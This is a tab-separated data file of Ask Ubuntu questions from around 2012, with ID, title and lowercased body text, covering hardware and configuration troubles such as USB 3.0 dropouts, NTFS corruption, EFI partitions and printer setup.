187784	nec usb 3.0 controller drops connection - ubuntu 12.04.1	i have some serious problems with technaxx pci-e 302p card . it has upd720200a nec chip with 4020 firmware . bios recognises it . sometimes it recognises devices and system mounts them and are functional for few minutes , other times they ca n't be mount and error occours . after fresh install card worked fine , but after kernel and firmware update it behaves as mentioned . outputs : uname -a linux asd-ga-ma770-ud3 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux lspci -vvv usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at fd8fe000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : xhci_hcd lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 07d1:3c0a d-link system dwa-140 rangebooster n adapter ( rev.b2 ) [ ralink rt3072 ] bus 005 device 004 : id 1997:1221 bus 005 device 003 : id 15c2:003c soundgraph inc. lsmod module size used by nls_iso8859_1 12713 0 nls_cp437 16991 0 vfat 17585 0 fat 61512 1 vfat vesafb 13844 1 saa7134_alsa 18602 1 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep tda827x 18182 1 snd_hda_codec_hdmi 32474 1 ir_lirc_codec 12859 0 lirc_dev 19204 1 ir_lirc_codec tda8290 22616 1 arc4 12529 2 snd_hda_codec_realtek 224173 1 ir_mce_kbd_decoder 12777 0 ir_sony_decoder 12510 0 ir_jvc_decoder 12507 0 tuner 27428 1 ir_rc6_decoder 12507 0 snd_hda_intel 33773 5 rt2800usb 22684 0 rt2800lib 58925 1 rt2800usb crc_ccitt 12667 1 rt2800lib rt2x00usb 20762 1 rt2800usb rt2x00lib 51144 3 rt2800usb , rt2800lib , rt2x00usb mac80211 506816 3 rt2800lib , rt2x00usb , rt2x00lib ir_rc5_decoder 12507 0 rc_avermedia_m135a 12526 0 rc_imon_pad 12505 0 ir_nec_decoder 12507 0 cfg80211 205544 2 rt2x00lib , mac80211 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_ctxfi 111202 2 snd_hwdep 13668 1 snd_hda_codec imon 32839 0 snd_pcm 97188 5 saa7134_alsa , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_ctxfi snd_seq_midi 13324 0 saa7134 181851 1 saa7134_alsa videobuf_dma_sg 19354 2 saa7134_alsa , saa7134 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi joydev 17693 0 rc_core 26412 13 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , rc_avermedia_m135a , rc_imon_pad , ir_nec_decoder , imon , saa7134 snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event fglrx 3263886 101 videobuf_core 26390 2 saa7134 , videobuf_dma_sg v4l2_common 16454 2 tuner , saa7134 videodev 98259 3 tuner , saa7134 , v4l2_common sp5100_tco 13791 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 28 saa7134_alsa , snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_ctxfi , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device v4l2_compat_ioctl32 17128 1 videodev tveeprom 21249 1 saa7134 i2c_piix4 13301 0 soundcore 15091 1 snd edac_core 53746 0 serio_raw 13211 0 snd_page_alloc 18529 3 snd_hda_intel , snd_ctxfi , snd_pcm edac_mce_amd 23709 0 wmi 19256 0 mac_hid 13253 0 ppdev 17113 0 parport_pc 32866 1 k10temp 13166 0 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp usb_storage 49198 0 uas 18180 0 usbhid 47199 0 hid 99559 1 usbhid firewire_ohci 41000 0 firewire_core 63558 1 firewire_ohci crc_itu_t 12707 1 firewire_core floppy 70365 0 pata_atiixp 13204 2 r8169 62099 0 dmesg | tail after plugging to usb 3.0 port [ 834.871296 ] sd 9:0:0:0 : rejecting i/o to offline device [ 834.871308 ] sd 9:0:0:0 : rejecting i/o to offline device [ 834.871319 ] sd 9:0:0:0 : rejecting i/o to offline device [ 834.871330 ] sd 9:0:0:0 : rejecting i/o to offline device [ 834.871530 ] sd 9:0:0:0 : [ sdd ] unhandled error code [ 834.871536 ] sd 9:0:0:0 : [ sdd ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 834.871545 ] sd 9:0:0:0 : [ sdd ] cdb : read ( 10 ) : 28 00 0e 8e 48 0a 00 00 3e 00 [ 834.871564 ] end_request : i/o error , dev sdd , sector 244205578 [ 834.875497 ] sd 8:0:0:1 : device offlined - not ready after error recovery [ 834.885339 ] usb 9-2 : usb disconnect , device number 2 are there any other outputs need for answering ? i 'll post them asap . i could of course reject updating the system but i think it 's halfway solution . any help appreciated . btw usb 2.0 and 1.1 ports run well , card itself runs under win7 as charm . tom
187787	is text and ogg file thumbnailing available outside of nautilus ?	i use ubuntu 12.04 and in nautilus i can see thumbnails of several files including ogg ( with embedded artwork ) and text files , just like in this screenshot : it 's a nice feature . i ca n't see ogg and text thumbnails in other file managers like pcmanfm . moreover , i have another machine with arch linux and i even ca n't see them in nautilus . i can see thumbnails for some other file types ( eps , svg , png , jpg or pdf ) , but not for ogg and text files . my question is , does ubuntu use a patched nautilus version with extended capabilities to see text and music thumbnailes ? and , if so , is it possible to reproduce this extended capabilities to other file managers as pcmanfm ?
187788	can a version update ( from 12.04 to 12.10 ) give driver problems ?	i recently installed 12.04 . even though i 'm not completely new to the linux world , i wanted to ask this : i had a problem in video drivers , and i fixed it by a complete re-installation of the whole operating system . if i install the new version using the update manager ( so without a complete re-installation ) , will my drivers be the same as they are ? and what about my data ?
187790	has anyone tried putting ubuntu on the new macbook pro retina ?	has anyone tried putting ubuntu on the new macbook pro retina ? if so , were there driver issues ? i really want to do this seeing that i am starting my computer science curriculum very soon .
187791	booting from usb only	i am a newbie on linux and dont understand many things unless given a line by line instructions . i am trying but linux does take some getting used to . i have installed ubuntu from live usb stick . now i can not boot my system without the usb being plugged in . there are answers whereby certain commands need to be run . for any command that i run with sudo ( prefix ) the terminal asks me for a password which i dont know . what do i do ? how do i fix it such that the booting happens without usb being plugged in . so far i have just been booting from usb . please help a recent converted from windows . thanks all
187792	how do i create a new usergroup on a mac partition ?	i want to do this because i 'm trying to fix user permissions from ubuntu on my mac os x partition and ubuntu does n't have the `` wheel '' group that i so desperately need ! please do n't trash me for this but i set my whole mac os x partition to give read and write access to everyone so i could access and modify everything on it from my dual-booting ubuntu os , and now everything is screwed ... i do n't have the original mac os x installation dvd and booting a mac os x 10.5.6 dvd gives me kernel panics ... the os installed on that mac partition is 10.4.11 . is there any hope for me to ever fix it ? i do n't have money to buy utilities , and i ca n't use applejack either because my permissions are so messed up ... none of the posted answers are what i wanted to do . i wanted to add fields to a user that was on my mac partition , not a user part of the ubuntu groups . is that possible ?
187800	my ubuntu 12.04 have input lags	i 'm experiencing severe keyboard lags while browsing and also even mouse lags sometimes . it happened for me before and i 've reinstalled 12.04 but after a week it started the same way . please help me . my hardware specifications are : hdd:320 gb [ 45 gb for ubuntu ] ram : 3gb made : toshiba satellite l510 laptop
187802	virtualbox usb problem	how can i use a usb stick in the virtual machine ? when i opened 'settings ' , a warning opened by itself and said that i had to add my user to the group vboxusers . i did that ( sudo adduser naomi vboxusers ) , but the warning is still displayed , and the usb stick is still not recognized by the vm , although it is by the host . if i click 'add ' on the 'usb ' tab of the settings , it says 'no device available ' . thanks .
187813	ntfs corruption : files created in linux corrupted when windows boots	i 'm getting some file loss and corruption on my win7/ubuntu 12.04 dual boot setup . i have a large shared ntfs partition . i have my windows docs/music/etc . directories on that file and have the comparable directors in linux setup as a sym . link . i 'm using ntfs-3g on the linux side of things to manage the ntfs partition . the shared partition is on a logical partition along with my linux /home / and /swap partitions . the ntfs partition is mounted at boot time via fstab with the following options : ntfs-3g users , nls=utf8 , locale=en_us.utf-8 , exec , rw the problem seems to be confined to newly created and recently edited files . i have not see data loss or corruption when creating/editing files in windows and then moving over to ubuntu . i 've been using the sync command aggressively in ubuntu to try to ensure everything is getting written to the hdd . i do not use hibernate in windows so i know it 's not the usual missing files due to hibernation problem . i 'm not seeing any mount related issues on dmesg . most recently i had a set of files related to a latex document go bad . some of them show up in ubuntu but i am unable to delete them . in the gui file browser they are given thumbnails associated with files i created on my last boot of windows . to be more specific : i created a few png files in windows . the files corrupted by that windows boot are associated with running pdflatex on a file and are not image files . however , two of the corrupted files show up with the thumbnail image of one of the previously mentioned png files . the png files are not in the same directory as the latex files but they are both win the document folder tree . i 've had sucess with using ntfs for shared data in the past and am hoping there 's some quirk here i 'm missing and it 's not just bad luck . on one hand this appears to be some kind of windows problem as data loss occurs when i boot to windows after having worked in ubuntu for a while . however , i 'm assuming it 's more on the ubuntu end as it requires the special ntfs drivers . edit for more info : this is a lenovo thinkpad l430 . purchased new in the last month . so it 's a fairly fresh install . many of the files on the shared partition were copied over from a previous ntfs formatted shared partition on another hdd . as requested : here 's a sample chkdsk log . some of the files its mentioning were files that got deleted off the partition while in ubuntu . others were created/edited but not deleted . checking file system on d : volume dismounted . all opened handles to this volume are now invalid . volume label is files . chkdsk is verifying files ( stage 1 of 3 ) ... attribute record of type 0x80 and instance tag 0x2 is cross linked starting at 0x789f47 for possibly 0x21 clusters . some clusters occupied by attribute of type 0x80 and instance tag 0x2 in file 0x42 is already in use . deleting corrupt attribute record ( 128 , `` '' ) from file record segment 66 . 86496 file records processed . file verification completed . 385 large file records processed . 0 bad file records processed . 0 ea records processed . 0 reparse records processed . chkdsk is verifying indexes ( stage 2 of 3 ) ... deleted invalid filename screenshot from 2012-09-09 09:51:27.png ( 72 ) in directory 46 . the ntfs file name attribute in file 0x48 is incorrect . 53 00 63 00 72 00 65 00 65 00 6e 00 73 00 68 00 s.c.r.e.e.n.s.h . 6f 00 74 00 20 00 66 00 72 00 6f 00 6d 00 20 00 o.t . .f.r.o.m . . 32 00 30 00 31 00 32 00 2d 00 30 00 39 00 2d 00 2.0.1.2.-.0.9.- . 30 00 39 00 20 00 30 00 39 00 3a 00 35 00 31 00 0.9 . .0.9. : .5.1 . 3a 00 32 00 37 00 2e 00 70 00 6e 00 67 00 0d 00 : .2.7 ... p.n.g ... 00 00 00 00 00 00 90 94 49 1f 5e 00 00 80 d4 00 ... ... i.^ ... . file 72 has been orphaned since all its filenames were invalid windows will recover the file in the orphan recovery phase . correcting minor file name errors in file 72 . index entry found.000 of index $ i30 in file 0x5 points to unused file 0x11 . deleting index entry found.000 in index $ i30 of file 5 . index entry found.001 of index $ i30 in file 0x5 points to unused file 0x16 . deleting index entry found.001 in index $ i30 of file 5 . index entry found.002 of index $ i30 in file 0x5 points to unused file 0x15 . deleting index entry found.002 in index $ i30 of file 5 . index entry downlo~1 of index $ i30 in file 0x28 points to unused file 0x2b6 . deleting index entry downlo~1 in index $ i30 of file 40 . unable to locate the file name attribute of index entry screenshot from 2012-09-09 09:51:27.png of index $ i30 with parent 0x2e in file 0x48 . deleting index entry screenshot from 2012-09-09 09:51:27.png in index $ i30 of file 46 . an index entry of index $ i30 in file 0x32 points to file 0x151e8 which is beyond the mft . deleting index entry latexsheet.tex in index $ i30 of file 50 . an index entry of index $ i30 in file 0x58bc points to file 0x151eb which is beyond the mft . deleting index entry d8cz82pk in index $ i30 of file 22716 . an index entry of index $ i30 in file 0x58bc points to file 0x151f7 which is beyond the mft . deleting index entry ega4qeax in index $ i30 of file 22716 . an index entry of index $ i30 in file 0x58bc points to file 0x151e9 which is beyond the mft . deleting index entry ngtb469m in index $ i30 of file 22716 . an index entry of index $ i30 in file 0x58bc points to file 0x151fb which is beyond the mft . deleting index entry wu5rkxab in index $ i30 of file 22716 . index entry comp220-lab3.synctex.gz of index $ i30 in file 0xda69 points to unused file 0xd098 . deleting index entry comp220-lab3.synctex.gz in index $ i30 of file 55913 . unable to locate the file name attribute of index entry comp220-numbergrammars.aux of index $ i30 with parent 0xda69 in file 0xa276 . deleting index entry comp220-numbergrammars.aux in index $ i30 of file 55913 . the file reference 0x500000000cd43 of index entry comp220-numbergrammars.out of index $ i30 with parent 0xda69 is not the same as 0x600000000cd43 . deleting index entry comp220-numbergrammars.out in index $ i30 of file 55913 . the file reference 0x500000000cd45 of index entry comp220-numbergrammars.pdf of index $ i30 with parent 0xda69 is not the same as 0xc00000000cd45 . deleting index entry comp220-numbergrammars.pdf in index $ i30 of file 55913 . an index entry of index $ i30 in file 0xda69 points to file 0x15290 which is beyond the mft . deleting index entry gram.aux in index $ i30 of file 55913 . an index entry of index $ i30 in file 0xda69 points to file 0x15291 which is beyond the mft . deleting index entry gram.out in index $ i30 of file 55913 . an index entry of index $ i30 in file 0xda69 points to file 0x15292 which is beyond the mft . deleting index entry gram.pdf in index $ i30 of file 55913 . unable to locate the file name attribute of index entry comp230-quiz1.synctex.gz of index $ i30 with parent 0xda6f in file 0xd183 . deleting index entry comp230-quiz1.synctex.gz in index $ i30 of file 55919 . an index entry of index $ i30 in file 0xf3cc points to file 0x15283 which is beyond the mft . deleting index entry require-transform.rkt in index $ i30 of file 62412 . an index entry of index $ i30 in file 0xf3cc points to file 0x15284 which is beyond the mft . deleting index entry set.rkt in index $ i30 of file 62412 . an index entry of index $ i30 in file 0xf497 points to file 0x15280 which is beyond the mft . deleting index entry logger.rkt in index $ i30 of file 62615 . an index entry of index $ i30 in file 0xf497 points to file 0x15281 which is beyond the mft . deleting index entry misc.rkt in index $ i30 of file 62615 . an index entry of index $ i30 in file 0xf497 points to file 0x15282 which is beyond the mft . deleting index entry more-scheme.rkt in index $ i30 of file 62615 . an index entry of index $ i30 in file 0xf5bf points to file 0x15285 which is beyond the mft . deleting index entry core-layout.rkt in index $ i30 of file 62911 . an index entry of index $ i30 in file 0xf5e0 points to file 0x15286 which is beyond the mft . deleting index entry ref.scrbl in index $ i30 of file 62944 . an index entry of index $ i30 in file 0xf6f0 points to file 0x15287 which is beyond the mft . deleting index entry base-render.rkt in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf6f0 points to file 0x15288 which is beyond the mft . deleting index entry html-properties.rkt in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf6f0 points to file 0x15289 which is beyond the mft . deleting index entry html-render.rkt in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf6f0 points to file 0x1528b which is beyond the mft . deleting index entry latex-prefix.rkt in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf6f0 points to file 0x1528c which is beyond the mft . deleting index entry latex-render.rkt in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf6f0 points to file 0x1528e which is beyond the mft . deleting index entry scribble.tex in index $ i30 of file 63216 . an index entry of index $ i30 in file 0xf717 points to file 0x1528a which is beyond the mft . deleting index entry lang.rkt in index $ i30 of file 63255 . an index entry of index $ i30 in file 0xf721 points to file 0x1528d which is beyond the mft . deleting index entry lang.rkt in index $ i30 of file 63265 . an index entry of index $ i30 in file 0xf764 points to file 0x1528f which is beyond the mft . deleting index entry lang.rkt in index $ i30 of file 63332 . an index entry of index $ i30 in file 0x14261 points to file 0x15270 which is beyond the mft . deleting index entry fddff3ae9ae2221207f144821d475c08ec3d05 in index $ i30 of file 82529 . an index entry of index $ i30 in file 0x14621 points to file 0x15268 which is beyond the mft . deleting index entry fetch_head in index $ i30 of file 83489 . an index entry of index $ i30 in file 0x14650 points to file 0x15272 which is beyond the mft . deleting index entry 86 in index $ i30 of file 83536 . an index entry of index $ i30 in file 0x14651 points to file 0x15266 which is beyond the mft . deleting index entry pack-7f54ce9f8218d2cd8d6815b8c07461b50584027f.idx in index $ i30 of file 83537 . an index entry of index $ i30 in file 0x14651 points to file 0x15265 which is beyond the mft . deleting index entry pack-7f54ce9f8218d2cd8d6815b8c07461b50584027f.pack in index $ i30 of file 83537 . an index entry of index $ i30 in file 0x146f1 points to file 0x15275 which is beyond the mft . deleting index entry master in index $ i30 of file 83697 . an index entry of index $ i30 in file 0x146f6 points to file 0x15276 which is beyond the mft . deleting index entry remotes in index $ i30 of file 83702 . an index entry of index $ i30 in file 0x1477d points to file 0x15278 which is beyond the mft . deleting index entry pad.rkt in index $ i30 of file 83837 . an index entry of index $ i30 in file 0x14797 points to file 0x1527c which is beyond the mft . deleting index entry pad1.rkt in index $ i30 of file 83863 . an index entry of index $ i30 in file 0x14810 points to file 0x1527d which is beyond the mft . deleting index entry cm.rkt in index $ i30 of file 83984 . an index entry of index $ i30 in file 0x14926 points to file 0x1527e which is beyond the mft . deleting index entry multi-file-search.rkt in index $ i30 of file 84262 . an index entry of index $ i30 in file 0x149ef points to file 0x1527f which is beyond the mft . deleting index entry com.rkt in index $ i30 of file 84463 . an index entry of index $ i30 in file 0x14b47 points to file 0x15202 which is beyond the mft . deleting index entry commit_editmsg in index $ i30 of file 84807 . an index entry of index $ i30 in file 0x14b47 points to file 0x15279 which is beyond the mft . deleting index entry index in index $ i30 of file 84807 . an index entry of index $ i30 in file 0x14b4c points to file 0x15274 which is beyond the mft . deleting index entry master in index $ i30 of file 84812 . an index entry of index $ i30 in file 0x14b61 points to file 0x1520b which is beyond the mft . deleting index entry 02 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x1525a which is beyond the mft . deleting index entry 28 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15208 which is beyond the mft . deleting index entry 29 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x1521f which is beyond the mft . deleting index entry 2c in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15261 which is beyond the mft . deleting index entry 2e in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x151f0 which is beyond the mft . deleting index entry 45 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x1523e which is beyond the mft . deleting index entry 47 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x151e5 which is beyond the mft . deleting index entry 49 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15214 which is beyond the mft . deleting index entry 58 in index $ i30 of file 84833 . index entry 6e of index $ i30 in file 0x14b61 points to unused file 0xd182 . deleting index entry 6e in index $ i30 of file 84833 . unable to locate the file name attribute of index entry a0 of index $ i30 with parent 0x14b61 in file 0xd29c . deleting index entry a0 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x1521b which is beyond the mft . deleting index entry cd in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15249 which is beyond the mft . deleting index entry d6 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15242 which is beyond the mft . deleting index entry df in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x15227 which is beyond the mft . deleting index entry ea in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x1522e which is beyond the mft . deleting index entry f3 in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b61 points to file 0x151f2 which is beyond the mft . deleting index entry ff in index $ i30 of file 84833 . an index entry of index $ i30 in file 0x14b62 points to file 0x15254 which is beyond the mft . deleting index entry 1ed39b36ad4bd48c91d22cbafd7390f1ea38da in index $ i30 of file 84834 . an index entry of index $ i30 in file 0x14b75 points to file 0x15224 which is beyond the mft . deleting index entry 96260247010fe9811fea773c08c5f3a314df3f in index $ i30 of file 84853 . an index entry of index $ i30 in file 0x14b79 points to file 0x15219 which is beyond the mft . deleting index entry 8f689724ca23528dd4f4ab8b475ace6edcb8f5 in index $ i30 of file 84857 . an index entry of index $ i30 in file 0x14b7c points to file 0x15223 which is beyond the mft . deleting index entry 1df17cf850656be42c947cba6295d29c248d94 in index $ i30 of file 84860 . an index entry of index $ i30 in file 0x14b7c points to file 0x15217 which is beyond the mft . deleting index entry 31db8a3c72a3e44769bbd8db58d36f8298242c in index $ i30 of file 84860 . an index entry of index $ i30 in file 0x14b7c points to file 0x15267 which is beyond the mft . deleting index entry 8e1254d755ff1882d61c07011272bac3612f57 in index $ i30 of file 84860 . an index entry of index $ i30 in file 0x14b82 points to file 0x15246 which is beyond the mft . deleting index entry f959bfaf9643c1b9e78d5ecf8f669133efdbf3 in index $ i30 of file 84866 . an index entry of index $ i30 in file 0x14b88 points to file 0x151fe which is beyond the mft . deleting index entry 7e9aa15b1196b2c60116afa4ffa613397f2185 in index $ i30 of file 84872 . an index entry of index $ i30 in file 0x14b8a points to file 0x151ea which is beyond the mft . deleting index entry 73cb0cd248e494bb508f41b55d862e84cdd6e0 in index $ i30 of file 84874 . an index entry of index $ i30 in file 0x14b8e points to file 0x15264 which is beyond the mft . deleting index entry bd555d9f0383cc14c317120149e9376a8094c4 in index $ i30 of file 84878 . an index entry of index $ i30 in file 0x14b96 points to file 0x15212 which is beyond the mft . deleting index entry 630dba40562d991bc6cbb6fed4ba638542e9c5 in index $ i30 of file 84886 . an index entry of index $ i30 in file 0x14b99 points to file 0x151ec which is beyond the mft . deleting index entry 478be31ca8e538769246e22bba3330d81dc3c8 in index $ i30 of file 84889 . an index entry of index $ i30 in file 0x14b99 points to file 0x15258 which is beyond the mft . deleting index entry 66c60c0a0f3253bc9a5112697e4cbb0dfc0c78 in index $ i30 of file 84889 . an index entry of index $ i30 in file 0x14b9c points to file 0x15238 which is beyond the mft . deleting index entry 1c7ceeddc2953496f9ffbfc0b6fb28846e3fe3 in index $ i30 of file 84892 . an index entry of index $ i30 in file 0x14b9c points to file 0x15247 which is beyond the mft . deleting index entry ae6e32ffc49d897d8f8aeced970a90d3653533 in index $ i30 of file 84892 . an index entry of index $ i30 in file 0x14ba0 points to file 0x15233 which is beyond the mft . deleting index entry f71c7d874e45179a32e138b49bf007e5bbf514 in index $ i30 of file 84896 . index entry 2e04fefbd794f050d45e7a717d009e39204431 of index $ i30 in file 0x14ba7 points to unused file 0xd097 . deleting index entry 2e04fefbd794f050d45e7a717d009e39204431 in index $ i30 of file 84903 . an index entry of index $ i30 in file 0x14baa points to file 0x15241 which is beyond the mft . deleting index entry 0dda7dec1c635cd646dfef308e403c2843d5dc in index $ i30 of file 84906 . an index entry of index $ i30 in file 0x14baa points to file 0x151fc which is beyond the mft . deleting index entry 98151e654dd546edcfdec630bc82d90619ac8e in index $ i30 of file 84906 . an index entry of index $ i30 in file 0x14bb1 points to file 0x151e9 which is beyond the mft . deleting index entry 1997c5be62ffeebc99253cced7608415e38e4e in index $ i30 of file 84913 . an index entry of index $ i30 in file 0x14bb1 points to file 0x1521d which is beyond the mft . deleting index entry 6bf3aedefd3ac62d9c49cad72d05e8c0ad242c in index $ i30 of file 84913 . an index entry of index $ i30 in file 0x14bb1 points to file 0x151f4 which is beyond the mft . deleting index entry 907b755afdca14c00be0010962d0861af29264 in index $ i30 of file 84913 . an index entry of index $ i30 in file 0x14bb3 points to file 0x15218 which is beyond the mft . deleting index entry
187814	does libreoffice have an `` outline view '' similar to microsoft 2010 ?	i need to know where to find and how to use something similar to the outline view like in microsoft word ?
187816	how do i get the scanner on a canon pixma mg5300 working ?	i have a canon pixma mg5300 series printer/scanner . i am able to print with it , after i successfully added the driver ( if i remember correctly , i had to install it from the constructor , though i 'm not sure , it was quite some time ago ) . however , i do n't know how to use the scanner . i tried typing 'scan ' in the dash , and a application named 'simple scan ' appeared . yet this application does n't recognize the scanner , even though if i click 'print ' on firefox , it recognizes the printer . how to scan with ubuntu 12.04 ?
187817	unable to create efi partition on macbook air 3,1	a couple of months ago , i was able to install ubuntu on my wife 's macbook air . at the time it was still running lion when i wiped it . about a week later , we wiped ubuntu and installed mountain lion . recently , i decided i wanted to stick with ubuntu and so went through the process of wiping osx to install ubuntu . however this time i was not able to because i ca n't seem to create an efi partition any more . i run the live usb disk , using this method this method to get it running . use gparted to create a gpt partition table and create a 200 mb fat 32 partition , giving it the boot option . when i then go through the install process , the option for making this particular partition an efi partition does n't show . i 'm not sure what i 'm doing wrong as i 'm fairly certain this is what i did last time . my concern is that maybe installing mountain lion has changed the mba 's bios , which is causing this issue . the live usb tends to hang fairly often too which it never did before . i 've tried installing with ubuntu 12.04.1 ( no efi partition ) , ubuntu 12.04.1 dvd ( freezes on ubuntu loading screen ) , ubuntu 12.04.1 +mac ( no efi partition , ubuntu 12.10 beta ( no efi partition ) , and ubuntu 11.10 ( freezes on ubuntu loading screen ) . last time i did it with just 12.04 and so i 'm not sure if that 's a possibility but not sure where i can get a hold of that . i really would appreciate any help . thanks !
187819	the buttons and seek bar disappeared from youtube videos - what can i do to remedy this problem ?	the buttons ( pause , stop , seek , etc ) have suddenly disappeared from youtube videos . does anyone have any ideas that could guide to defining the problem more accurately and then find a solution ?
187820	link java bytecode ( class files ) with java-command	is it possible to directly bind all *.class files with the java command ? at the moment i run java-files like : java myprog args is it possible to simple type myporg args ok , this is not a very important question , but it would be nice to know .
187821	partial upgrade on 12.04.1 , on what version i will be upgraded to ?	i am using 12.04.1 x86_64 on my system . this is fresh clean install . every time i check for updates using `` updates available '' menu-item i get the partial upgrade option . what does this mean ? just want to confirm on what version would my system be upgraded to . i have n't heard anything like 12.04.2 so i am assuming it would be 12.10 beta release . i have checked the settings that notify me the type of updates release ; it 's set to lts releases . is anybody else facing the issue ? please have a look at the screen shot : -
187822	how can i configure a canon pixma mg5300 to print wirelessly ?	how can i configure a printer to print wirelessly in ubuntu 12.04 ? i have a canon pixma mg 5300 series , and i am able to print correctly by usb ( the drivers were installed ) . now i 'm trying to do it wirelessly . i configured the printer so that it connects to my access point , and assigned it a static ip ( 192.168.0.6 ) . it connects correctly , and responds to ping . now i would like to use ubuntu 12.04 to send a file to be printed to that printer . i went to the dash and opened the application named 'printing ' . from there i clicked 'add ' . then 'network printer ' , then 'find a printer ' ( though here , i also tried a couple of the other possibilities that are mentionned , none worked ) . i typed the ip address . i clicked 'find ' , nothing happened . i ca n't go forwards . so how to make this wireless configuration work ?
187824	touchpad scrolling	just installed a fresh copy of ubuntu . i wonder if it 's possible to enable two fingers and edge scrolling , both ? ? ? i think i had this on xubuntu . btw , i have ubuntu 12.04.1 lts with gnome 3 installed .
187830	can only log-in through shell/terminal after doing dist-upgrade on ubuntu 12.04 , can only connect to internet using phone modem through bluetooth pan	i have 2 desktop environments installed , i 'm using the x-swat version of nvidia drivers which also got upgraded after doing `` sudo apt-get dist-upgrade '' . now i can only log-in using the terminal . tried `` sudo service lightdm restart '' , that command seemed to work but gets stuck at the `` *checking battery state '' . to make matters worse , i can only connect to the internet by tethering my laptop with/to my android phone ( sony ericsson xperia arc lt15i ) and i do n't know what commands to use to do same using the terminal so any solution that would require a working internet connection just makes me think that it would probably be easier just to reinstall os and just stick to the nouveau drivers . i have been an ubuntu user for quite some time now ( since 9.04 ) but i must admit that i am still a noob when it comes to terminal commands . i miss the penguin , help me !
187831	ubuntu , internet from two usb modems ?	i am using ubuntu 12.04 lts . my question is , i have two usb dongles and i can connect them to pc ( i have tried and connected both at a time ) but at a time system receiving connection from only one modem . its not doing from two modems . so is it possible to get connection from two modems ? thank you .
187832	added `startx` to autostart list , what to do now ?	i made a stupid mistake and wrote command `` startx '' in autostart applications in gnome . therefore gnome starts itself in cycle . how can i change autostart applications without logging into gnome ?
187833	libreoffice calc - perform operation on every nth cell	i would like to copy every 10th cell from a column of several thousand . is this possible ?
187834	can i use my android tablet as a 2nd monitor in ubuntu 12.04 ?	i love ubuntu 12.04 , but would like to use my samsung thrive 10.1 in android tablet as a second monitor . is this possible ?
187837	will the 20gb space be available for free after the expiration of 6-months valid music track ?	i read a new offer from ubutuone music store . that is , when you buy a new music track from ubuntuone music store , you will get 20gb cloud space . my doubt is related with 20gb of disk space . will the 20gb space be available for free after the expiration of 6-months valid music track , unless i am renewing the music store ?
187841	how to encrypt ubuntu home folder or partition and still able to hibernate/sleep my pc ?	i am currently dual-booting windows 7 and ubuntu 12 . during installation of ubuntu , i chose to encrypt my home folder . i just do n't like the fact that i ca n't put my computer to sleep or hibernate . i decided i could try something else . now i do n't have a lot of experience with bootloaders , but i was thinking of using truecrypt to encrypt both partitions by encrypting windows then installing ubuntu on a pre-encrypted partition . i 'm not sure that will work out too well . what tools should i use to nicely encrypt and dual-boot both windows 7 , and ubuntu while capable of hibernating or putting my computer to sleep ? i would also prefer not to hurt my pc performance to much either .
